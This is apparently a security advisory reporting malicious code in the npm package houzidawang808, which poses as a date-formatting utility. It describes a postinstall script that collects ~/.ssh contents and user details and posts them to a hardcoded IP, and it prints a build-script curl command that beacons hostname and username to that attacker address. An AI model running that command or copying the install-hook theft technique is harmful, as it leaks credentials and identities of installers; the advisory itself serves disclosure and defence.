MAL-2026-5732
Malicious code in houzidawang808 (npm)
Details
## Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654)

The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post, a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script `curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami)` that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential harvesting on installer machines.
Affected packages
No fixed version has been published yet for houzidawang808 (npm). Pin to a known-safe version or switch to an alternative.